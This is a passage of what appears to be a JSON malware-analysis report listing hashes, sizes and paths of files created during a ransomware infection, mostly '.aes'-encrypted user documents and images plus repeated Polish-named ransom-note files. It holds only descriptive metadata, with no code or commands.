}, { "archive_path": "extracted_files/cda97cd47f344c4ce39926392f9c548b957e2b82", "file_type": "created_file", "id": "file_76", "md5_hash": "f84fe8b88700cafc4ff65e6298d5a1ef", "norm_filename": "c:\\users\\kft6utqw\\documents\\hhx-9rkimupsnon0ejb.pptx.aes", "sha1_hash": "cda97cd47f344c4ce39926392f9c548b957e2b82", "sha256_hash": "aa41569f77a436824375431b555c936e3db6dbbe649c8ec12d2935a1d3519a4d", "size": 49762, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/381041bc4e94295c38ca1357fc6e205acab7192b", "file_type": "created_file", "id": "file_77", "md5_hash": "ad2026da18a6b90512a138ba1eb63480", "norm_filename": "c:\\users\\kft6utqw\\documents\\lcptyhqe.xlsx.aes", "sha1_hash": "381041bc4e94295c38ca1357fc6e205acab7192b", "sha256_hash": "0d70b1d2ef594a2b81fafcdc134f86efee925230d0d36d0a0d2f2a02d5368e59", "size": 50066, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/4130f2ee7457f5be0424affcc2b3708d256fdb00", "file_type": "created_file", "id": "file_78", "md5_hash": "cd6547e82546369d205f3c01ea5abbc0", "norm_filename": "c:\\users\\kft6utqw\\documents\\u5x9.ppt.aes", "sha1_hash": "4130f2ee7457f5be0424affcc2b3708d256fdb00", "sha256_hash": "1cf5460dba6cfe5cba25fcb560b705964b94cb3a6c2b198d7a6ece21be011e5e", "size": 20098, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/db5ddc160bf842f336f418e21371346a3f09fc3b", "file_type": "created_file", "id": "file_79", "md5_hash": "1adb40e44060aba93c76a3109e110d1c", "norm_filename": "c:\\users\\kft6utqw\\documents\\wffphgzw1qt5nubkpq.docx.aes", "sha1_hash": "db5ddc160bf842f336f418e21371346a3f09fc3b", "sha256_hash": "70f279cda13e70219f3d73933b90f5c8961db23b00fd003a7bf7f38cad1b1a39", "size": 33682, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/26771d40be67fcd75deb178cb9ded7eb83ec7fc7", "file_type": "created_file", "id": "file_80", "md5_hash": "42d603d0f87c590def22ae3f8564d81f", "norm_filename": "c:\\users\\kft6utqw\\documents\\zb6u3g7h.xlsx.aes", "sha1_hash": "26771d40be67fcd75deb178cb9ded7eb83ec7fc7", "sha256_hash": "49e717e750ac3e95199a8a887f47feaf0dbd8aec66f394e9105fde8b40f2e658", "size": 5170, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/9e8b264a6cd08d7e34dba0ee314ba034fbe0583b", "file_type": "created_file", "id": "file_81", "md5_hash": "69acb08ae8248c29e285c9963fb7079f", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\hgzfj\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "9e8b264a6cd08d7e34dba0ee314ba034fbe0583b", "sha256_hash": "4bc51d5c37619b6e1008b39ca72b5dccb28b952de60feedf9f504a979d87fcbe", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/9e8b264a6cd08d7e34dba0ee314ba034fbe0583b", "file_type": "created_file", "id": "file_82", "md5_hash": "69acb08ae8248c29e285c9963fb7079f", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\tmdcgsua1hpeixp_g-_\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "9e8b264a6cd08d7e34dba0ee314ba034fbe0583b", "sha256_hash": "4bc51d5c37619b6e1008b39ca72b5dccb28b952de60feedf9f504a979d87fcbe", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/4fdc86cd4eaea06740c79d019791429deefebb68", "file_type": "created_file", "id": "file_83", "md5_hash": "a62a3583cdce1e80ddf7213b9f0cf77e", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "4fdc86cd4eaea06740c79d019791429deefebb68", "sha256_hash": "35f91180f40bf66f2d652a57b0e47939e2bcdd5bbf6303cd36f04b5014c5a9c0", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/198068b05a66d806fd08af8eb9488821c360b93c", "file_type": "created_file", "id": "file_84", "md5_hash": "8320e6f45dadffeec167aeee53609ddd", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "198068b05a66d806fd08af8eb9488821c360b93c", "sha256_hash": "c9038eb0fa2705d6c7c6500f9514f8905b0f787dcb549b0810e45c993f2bab6c", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/6cbc228c55739bf871256f3a4223ee060f8ddf80", "file_type": "created_file", "id": "file_85", "md5_hash": "74c1a1938a4d9ab8d168acc8a181d601", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\vuewifeok\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "6cbc228c55739bf871256f3a4223ee060f8ddf80", "sha256_hash": "1213dc777fe40c479bd05d88224cff59e4be0682fe19512d1198f3bc71f3459a", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/24ee2b9ae39e68a8db7d433d2b28dae8e8bf7ef8", "file_type": "created_file", "id": "file_86", "md5_hash": "568ee3a769c9fea2d890bb6bc23c43fd", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\w26w\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "24ee2b9ae39e68a8db7d433d2b28dae8e8bf7ef8", "sha256_hash": "823d99ece7193051415cd84e5417f72858a43a0499f061ebd366ecf3eec37758", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/b9f29decd8fdbe5aeb45da2133995c8ddf018b6e", "file_type": "created_file", "id": "file_87", "md5_hash": "e17f25a09167186cbeb09ae377389eb2", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "b9f29decd8fdbe5aeb45da2133995c8ddf018b6e", "sha256_hash": "1095d4cd7fcbb4607ec5a463c37231865f1881e0bf043ad77cff54784f8bec9c", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/b9f29decd8fdbe5aeb45da2133995c8ddf018b6e", "file_type": "created_file", "id": "file_88", "md5_hash": "e17f25a09167186cbeb09ae377389eb2", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "b9f29decd8fdbe5aeb45da2133995c8ddf018b6e", "sha256_hash": "1095d4cd7fcbb4607ec5a463c37231865f1881e0bf043ad77cff54784f8bec9c", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/7309d13f144e5ff6eb79a0149b8cc52249328d5a", "file_type": "created_file", "id": "file_89", "md5_hash": "61702ec4ed58e11e5017a00eb72c6b2f", "norm_filename": "c:\\users\\kft6utqw\\pictures\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "7309d13f144e5ff6eb79a0149b8cc52249328d5a", "sha256_hash": "1f7d1c2f78b2fe7142a835ccfbd7cdb33658c40c3ef00d7aa149a6d2d3b6687d", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/41c9649c71bb5259f57663a682dfd41ab8c8819d", "file_type": "created_file", "id": "file_90", "md5_hash": "f78df3ccf69363318da2b79f73275f6e", "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\ogal6nmv2cy0e3 6\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "41c9649c71bb5259f57663a682dfd41ab8c8819d", "sha256_hash": "0ac260de49443f32b63b2baca13f5cf18f879883dbbd93ebed6d03dbf1bff09b", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/0b3b2414c455dc89776cca1b7fe73556ccb55c3f", "file_type": "created_file", "id": "file_91", "md5_hash": "386d8d06597b757afa311c47c3aa4b82", "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\clnojurnmvl\\d xgp5yxo\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "0b3b2414c455dc89776cca1b7fe73556ccb55c3f", "sha256_hash": "3e29286595c06b7005455a5741d77438965a41b89a2907a268d0e006c9293839", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/0b3b2414c455dc89776cca1b7fe73556ccb55c3f", "file_type": "created_file", "id": "file_92", "md5_hash": "386d8d06597b757afa311c47c3aa4b82", "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\clnojurnmvl\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "0b3b2414c455dc89776cca1b7fe73556ccb55c3f", "sha256_hash": "3e29286595c06b7005455a5741d77438965a41b89a2907a268d0e006c9293839", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/61416220fae7e3b98897ca7d9c31a7bdba43ced9", "file_type": "created_file", "id": "file_93", "md5_hash": "7f3ac020ebd789a44fe7f9054a8d2c78", "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "61416220fae7e3b98897ca7d9c31a7bdba43ced9", "sha256_hash": "e8381bb080537827cda3fa5f564bed2f476ddc429c71dc851328a680e30d10b1", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/61416220fae7e3b98897ca7d9c31a7bdba43ced9", "file_type": "created_file", "id": "file_94", "md5_hash": "7f3ac020ebd789a44fe7f9054a8d2c78", "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "61416220fae7e3b98897ca7d9c31a7bdba43ced9", "sha256_hash": "e8381bb080537827cda3fa5f564bed2f476ddc429c71dc851328a680e30d10b1", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fc0bf85fcfd24410fbfbfb350a6764c1cdac295c", "file_type": "created_file", "id": "file_95", "md5_hash": "7f292a9240dcc5e82bac4a9d88b3b5a6", "norm_filename": "c:\\users\\kft6utqw\\music\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "fc0bf85fcfd24410fbfbfb350a6764c1cdac295c", "sha256_hash": "d6e461b51bde144081fcebe373e689b337a4584ac37630e1b77a3d3d3782c4fb", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fc0bf85fcfd24410fbfbfb350a6764c1cdac295c", "file_type": "created_file", "id": "file_96", "md5_hash": "7f292a9240dcc5e82bac4a9d88b3b5a6", "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\eyqf5ksecamn6njljm\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "fc0bf85fcfd24410fbfbfb350a6764c1cdac295c", "sha256_hash": "d6e461b51bde144081fcebe373e689b337a4584ac37630e1b77a3d3d3782c4fb", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fc0bf85fcfd24410fbfbfb350a6764c1cdac295c", "file_type": "created_file", "id": "file_97", "md5_hash": "7f292a9240dcc5e82bac4a9d88b3b5a6", "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\lnvggurmvcvr5ekcq-4\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "fc0bf85fcfd24410fbfbfb350a6764c1cdac295c", "sha256_hash": "d6e461b51bde144081fcebe373e689b337a4584ac37630e1b77a3d3d3782c4fb", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/bb3da34a9fefe9a57e5c1fb1abf2529df3dce0f7", "file_type": "created_file", "id": "file_98", "md5_hash": "053b945285739893c800d9aec5eb49ad", "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\wqhnocgb21accc\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "bb3da34a9fefe9a57e5c1fb1abf2529df3dce0f7", "sha256_hash": "d23ca24ff3256b4352ef6445afe23a22476ce2c17388680f6e8c7341591e440b", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/bb3da34a9fefe9a57e5c1fb1abf2529df3dce0f7", "file_type": "created_file", "id": "file_99", "md5_hash": "053b945285739893c800d9aec5eb49ad", "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "bb3da34a9fefe9a57e5c1fb1abf2529df3dce0f7", "sha256_hash": "d23ca24ff3256b4352ef6445afe23a22476ce2c17388680f6e8c7341591e440b", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/50100ca304709d1100f77e998c26dabdb60d21d2", "file_type": "created_file", "id": "file_100", "md5_hash": "dcdeefee3471d9f83de438345adaf690", "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\ijyi ku9gkwyypfgatz\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "50100ca304709d1100f77e998c26dabdb60d21d2", "sha256_hash": "f2152c6eae06767063cfe7d5d8d30e3ebfefef59b4d4c29a2d1a749f01f38d54", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/e39ec167a2ae272277bd74eee84e3908c3cc60b3", "file_type": "created_file", "id": "file_101", "md5_hash": "6f071e286fb00941bb763dcf065a2b03", "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\r-_fu8vdku2twrl\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "e39ec167a2ae272277bd74eee84e3908c3cc60b3", "sha256_hash": "c06dea51ced62ad71648fb18782665920e285472ca578256236d31eed785795e", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/4d09e0dd3bf3a06f104be9dc5b55b3751498c2a3", "file_type": "created_file", "id": "file_102", "md5_hash": "e0eccdf604f1efd4682a51b796e9ef62", "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "4d09e0dd3bf3a06f104be9dc5b55b3751498c2a3", "sha256_hash": "a05219897c20d9b0e5c51af362fbbbcd8b1673aa6db26b735a1eee193327a99d", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/35269e157a6cc2e2bb959f2b4d3521f56ebd4798", "file_type": "created_file", "id": "file_103", "md5_hash": "b78f205248971f2d1ff730768e63e5e2", "norm_filename": "c:\\users\\kft6utqw\\videos\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "35269e157a6cc2e2bb959f2b4d3521f56ebd4798", "sha256_hash": "b2a65cde28ae1242f90263631daa065c89889d5563c5e40f0b45eabd001d7edb", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/35269e157a6cc2e2bb959f2b4d3521f56ebd4798", "file_type": "created_file", "id": "file_104", "md5_hash": "b78f205248971f2d1ff730768e63e5e2", "norm_filename": "c:\\users\\kft6utqw\\desktop\\1zxeg6xm\\cnh\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "35269e157a6cc2e2bb959f2b4d3521f56ebd4798", "sha256_hash": "b2a65cde28ae1242f90263631daa065c89889d5563c5e40f0b45eabd001d7edb", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/5682e1fcc43e9c826e4ed8d9b0fd77524199a9b5", "file_type": "created_file", "id": "file_105", "md5_hash": "46fd51df427668bd44f09aced2dbd4e3", "norm_filename": "c:\\users\\kft6utqw\\documents\\m-puio0zggg_ddsrzn.docx.aes", "sha1_hash": "5682e1fcc43e9c826e4ed8d9b0fd77524199a9b5", "sha256_hash": "ecc14b6db6c57c670ba5ec7e1b264a8fdb456d1db95af731fc95f55c557f1818", "size": 36482, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/effdb704a68c020ac042875b931f825b97bb454d", "file_type": "created_file", "id": "file_106", "md5_hash": "f78b8fe97171f5018267e38507441d19", "norm_filename": "c:\\users\\kft6utqw\\documents\\nfjvj4.docx.aes", "sha1_hash": "effdb704a68c020ac042875b931f825b97bb454d", "sha256_hash": "81f9f75421581977317422a81f42d7ade9979c8b0f46d2527efa6ce580f1f5e4", "size": 24226, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/3c1e6adc09077541eb0cbfe31885489a71dac793", "file_type": "created_file", "id": "file_107", "md5_hash": "7235e53d262732945d8a375f945a3de7", "norm_filename": "c:\\users\\kft6utqw\\documents\\q7ikh0ztpga.pptx.aes", "sha1_hash": "3c1e6adc09077541eb0cbfe31885489a71dac793", "sha256_hash": "d8b9d66ba32a3af0e5969470b6ba6cbc1a3cd1a989d9195dc3bda420e9dd7c92", "size": 10226, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/e6ee918d36b01b33ab0eba405d52a2ed8404181a", "file_type": "created_file", "id": "file_108", "md5_hash": "0e8560282b8c4a6ec1fd5c952c07af99", "norm_filename": "c:\\users\\kft6utqw\\documents\\qis2t0idi.docx.aes", "sha1_hash": "e6ee918d36b01b33ab0eba405d52a2ed8404181a", "sha256_hash": "12dc712ac4e8c7c64922bc04b611bbecae314082b5281e472a79a4012b1c50c2", "size": 69410, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/e6ccf79766615031b95fa6905bf9f8c0bb86fedc", "file_type": "created_file", "id": "file_109", "md5_hash": "d5727bec6b966e713f5810a849aa5246", "norm_filename": "c:\\users\\kft6utqw\\documents\\rltenk6-mjnoz-rauf3v.xlsx.aes", "sha1_hash": "e6ccf79766615031b95fa6905bf9f8c0bb86fedc", "sha256_hash": "f1d72df150d5ff7e642e31206a15bfc858ee681c762ef6e4d9dce8ecca154d44", "size": 69378, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/5f39bbf26aa189c857a5e9bf707d84daaef58d4b", "file_type": "created_file", "id": "file_110", "md5_hash": "7bb2e8ec37ac4b620d87678f7be34ef1", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\hgzfj\\-fs-r5u50bfkvf.png.aes", "sha1_hash": "5f39bbf26aa189c857a5e9bf707d84daaef58d4b", "sha256_hash": "8d68c18af26ecf7076fb96306ef866b2a408bd4153560d429fcabb5b3f093c23", "size": 80962, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/8ec9c05490617cb7dae0588fcc8e1751ffaa9d70", "file_type": "created_file", "id": "file_111", "md5_hash": "46d2e6cb7f4ca911091c2f4ee2ecd912", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\hgzfj\\z3txdnfa.bmp.aes", "sha1_hash": "8ec9c05490617cb7dae0588fcc8e1751ffaa9d70", "sha256_hash": "dda2c8e48380ff7b23ff11e5306d6ff216c520274b60a2ab7e8afe37de6d8e67", "size": 52898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/528b02ff9d2dd4d77fdfd9a700a22c4e096a83f4", "file_type": "created_file", "id": "file_112", "md5_hash": "d710ba1f9a81fbc1c13d7b20df83277a", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\tmdcgsua1hpeixp_g-_\\3wlgr0fumkcnd1.png.aes", "sha1_hash": "528b02ff9d2dd4d77fdfd9a700a22c4e096a83f4", "sha256_hash": "1061bd095af27d7fe35f56f3a9365a7d8def1a1b1ce4903df2f842ccfe399e55", "size": 12850, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/e7858ee1015a02b10e45e743ffe1d7bda89a2c02", "file_type": "created_file", "id": "file_113", "md5_hash": "f4b5452216d5cb0fb9cefaa11f242e58", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\tmdcgsua1hpeixp_g-_\\8hsxlmz5fcchefkc.png.aes", "sha1_hash": "e7858ee1015a02b10e45e743ffe1d7bda89a2c02", "sha256_hash": "b0f9d4f9a863238e515a3aa7c989f84f2451ff4afd27f8508365a4d1cefbd2dd", "size": 60482, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/982656311181ec70596ba950e6605305c7f7c8d6", "file_type": "created_file", "id": "file_114", "md5_hash": "10b2f6540bff351636f42339c1b643a7", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\tmdcgsua1hpeixp_g-_\\pr 2s.bmp.aes", "sha1_hash": "982656311181ec70596ba950e6605305c7f7c8d6", "sha256_hash": "b9a4b666e6d46baf75772ae2815a85bdceec9ddff501ca829b2b681ddc97f767", "size": 3682, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/b55dabf912cd2dee14689e0f5617f9bb3827cbe4", "file_type": "created_file", "id": "file_115", "md5_hash": "1878f1b773dcedc9cac040f2a2b2b8e6", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\2mlpi.gif.aes", "sha1_hash": "b55dabf912cd2dee14689e0f5617f9bb3827cbe4", "sha256_hash": "99f9a7d45602b8eb042ff8a2f59ad429261fe9211fd3f3c17e3b165aab8bbc9e", "size": 24194, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/08cf9655e9fb04f78375b746014526c0adab57d3", "file_type": "created_file", "id": "file_116", "md5_hash": "28e7ebc290ab9d66146d876f60719e1a", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\jp-9xm1bmm.gif.aes", "sha1_hash": "08cf9655e9fb04f78375b746014526c0adab57d3", "sha256_hash": "04d9f130381e626f3ef5ae2c5d68737dd28021da972605a4c7bb40b1a0ed8171", "size": 66786, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/0e48b08dd66df2e11f805f05032cbd61f1ab9877", "file_type": "created_file", "id": "file_117", "md5_hash": "eacdf76ecf7f4b5e78c0fd29a348cea0", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\m8qmiadbo6rfghx.png.aes", "sha1_hash": "0e48b08dd66df2e11f805f05032cbd61f1ab9877", "sha256_hash": "35435da68e0bfdb82aaa7d6eba4943c6e5fa6967b7e3d772e423ee36667ad96c", "size": 78434, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/326141069ecceb4de8e70b07bc4966c46fdc0702", "file_type": "created_file", "id": "file_118", "md5_hash": "51a99d0f1f32a1c3c6b6752f1f5eb550", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\_g8eg0.gif.aes", "sha1_hash": "326141069ecceb4de8e70b07bc4966c46fdc0702", "sha256_hash": "21557d72e6aa6fb37becd6d62c3805abae79d832cb17a8a9cae077d20a47bde4", "size": 94642, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/f6e54c903de4c689b8b613558eac73f12f998621", "file_type": "created_file", "id": "file_119", "md5_hash": "5e964211411022eaae91419506f2100e", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg\\c7fcn8b.bmp.aes", "sha1_hash": "f6e54c903de4c689b8b613558eac73f12f998621", "sha256_hash": "be249b51e66fb01abcba2bb7e138922a931fc802fa00fb298d61b44dd5f956d3", "size": 73042, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/0edc2846537f588767d9db0db53afe319e942ea7", "file_type": "created_file", "id": "file_120", "md5_hash": "ca71590f70e963d7a439b1f14c3a3505", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg\\dhn.png.aes", "sha1_hash": "0edc2846537f588767d9db0db53afe319e942ea7", "sha256_hash": "f8126bb815fce1b0b91dd2c322f04549d98a9a4447114d4ff9c3ff666833b1cf", "size": 56418, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/e2d51eca25c2e32a42ccb7c36e2d129b8f84a832", "file_type": "created_file", "id": "file_121", "md5_hash": "ef32330fa9b2e77d0fdd5d55e0cc2d5c", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg\\hlufp.gif.aes", "sha1_hash": "e2d51eca25c2e32a42ccb7c36e2d129b8f84a832", "sha256_hash": "fd4266409feb459b961db3603228b384e1834b7367a5194bc8e4ac27a5b2c165", "size": 36338, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/2fd6bfad49bd383a0c88348f17d5b81bec3139b9", "file_type": "created_file", "id": "file_122", "md5_hash": "13994d4d58262069576841f930dff4ec", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg\\hy7xic9tp5afulp5tba.gif.aes", "sha1_hash": "2fd6bfad49bd383a0c88348f17d5b81bec3139b9", "sha256_hash": "42d6c418c3d8474d7e5bd46a03792c229b36660c6b06971cf97ab1a4878f7ed6", "size": 43186, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/8bbb651b9a9cad681977091dfaa82ea1156c07d2", "file_type": "created_file", "id": "file_123", "md5_hash": "e9682fb13486a4857768244d92a3ff3e", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg\\ljszdoyltsvld u.jpg.aes", "sha1_hash": "8bbb651b9a9cad681977091dfaa82ea1156c07d2", "sha256_hash": "395b9e631f36c82f3e632fa4bce9f967eef300eeae7cdf94b7437465d7350c3e", "size": 48802, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/11860db0c8c140b98330f30f9d8a1d5309e1eab9", "file_type": "created_file", "id": "file_124", "md5_hash": "bb0f62a2dfbf26a6d751982c57a9aea1", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg\\metsfgadg8jkpvq.gif.aes", "sha1_hash": "11860db0c8c140b98330f30f9d8a1d5309e1eab9", "sha256_hash": "408c46f08f5fa0f924de60c284e5f59459d9be5ba5da929af5cbd8afc532beef", "size": 3586, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/3196e8a33ecdd91bef97e328dfdd2f6c0ca4b95a", "file_type": "created_file", "id": "file_125", "md5_hash": "0f6849849c005fc01b64c07f1fab5bdd", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg\\qb7s9ah4l3t.png.aes", "sha1_hash": "3196e8a33ecdd91bef97e328dfdd2f6c0ca4b95a", "sha256_hash": "0ef2caf3fd1bd68668edb02a02a268caf59dfa55837c8984b56ec57f32e425c5", "size": 46082, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/dc75277d5caab8a220c0ce943b9472a63f3fdf10", "file_type": "created_file", "id": "file_126", "md5_hash": "fba6c69ee942cac203edc54a01c42d08", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\vuewifeok\\btmvvnx cfkn1xv99u44.gif.aes", "sha1_hash": "dc75277d5caab8a220c0ce943b9472a63f3fdf10", "sha256_hash": "53c62a0c3ecd866e249b6f10fe675b964f382736c2c11431dd6cea61b0f983ed", "size": 94146, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/ccf01650ba62909974bed348fb6aeb60e995be11", "file_type": "created_file", "id": "file_127", "md5_hash": "accf228c234cf26a0c7d6fec048abcd4", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\vuewifeok\\c wnwie5.gif.aes", "sha1_hash": "ccf01650ba62909974bed348fb6aeb60e995be11", "sha256_hash": "70215d5e16468252784d53a279e6780e5abb2bc1edf5ae0fed2569ed3f737e96", "size": 11890, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/abe1a5c67de5edd1db346df2bfdcd05a82250afa", "file_type": "created_file", "id": "file_128", "md5_hash": "34f09333c32178ec0fe4798c51fcdada", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\vuewifeok\\zfdojvki.png.aes", "sha1_hash": "abe1a5c67de5edd1db346df2bfdcd05a82250afa", "sha256_hash": "43558bbd5f66437caa2b7adc80601b6bf26762aaf5d66520d9224efe9bb0bf4b", "size": 20498, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/18124af8d920518f38592e2e87343a3d0c7ee7c4", "file_type": "created_file", "id": "file_129", "md5_hash": "e73c10079a2f673d61f869badd8155fb", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\w26w\\-4w-q4wd1z.bmp.aes", "sha1_hash": "18124af8d920518f38592e2e87343a3d0c7ee7c4", "sha256_hash": "a046acd6e3623ac61becbfe7961c335671bfaf60d2943faf4bf6a0e336f86bc2", "size": 42962, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/a4daf97345b04e6f0bf6a4c8e37a67ce7c7b5998", "file_type": "created_file", "id": "file_130", "md5_hash": "35dbd9ccfd154bfd175a0bd391b1c46a", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\w26w\\fs30oromojdbc.gif.aes", "sha1_hash": "a4daf97345b04e6f0bf6a4c8e37a67ce7c7b5998", "sha256_hash": "8d54992fefddb06e6fc957fbc58f36d6d91aaf22370bdbbd91e5fda1e9b329f7", "size": 66802, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/25f8e127cb515a948ce63f7931fc467221a3d945", "file_type": "created_file", "id": "file_131", "md5_hash": "935889cf8e562e318c55a318428be53c", "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\w26w\\kfh dlkg2staglp.jpg.aes", "sha1_hash": 